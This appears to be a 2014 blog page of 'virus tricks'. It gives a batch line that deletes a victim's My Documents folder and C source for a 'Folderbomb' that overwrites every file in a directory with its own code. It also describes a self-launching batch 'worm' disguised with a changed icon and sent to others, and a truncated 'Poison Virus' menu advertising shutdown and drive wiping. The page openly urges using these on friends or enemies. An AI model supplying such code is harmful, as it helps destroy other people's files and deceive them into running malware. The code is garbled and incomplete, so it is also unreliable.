Thursday, 16 January 2014

VIRUS CODE-1

VIRUS CODE-1

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITHBAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.

VIRUS CODE-2

VIRUS CODE-2

/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......*/


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
 

Trick to make PowerFull Worm Virus.

Trick to make PowerFull Worm Virus.


Worms are Programs that Replicate themselves from System to System without the use of a Host File. Worms generally Exist inside the other Files like Word or Excel Documents. This Trick can be used to annoy Friends or Enemy.
Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.

1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.

Trick to make Poison Virus

Trick to make Poison Virus

There isTrick to make aPoison Virusi.e Virus which would definetly lead to destruction in computer.
This trick can be used to annoy Friends or Enemy.

This Virus would ask to choose a number
between 1 - 5 and then do a certain action :




1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown

To make this simple virus follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

@echo off
title The end of the world
cd C:\
:menu
cls
echo 
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


3) Save it as PoisonVirus.bat.

4) Now it is done.

So it is a simple Trick to make Poison Virus.

Python Tutorial - Part 2

Python Tutorials Part 2 After installation of Python software on windows machine in previous tutorial, lets proceed ...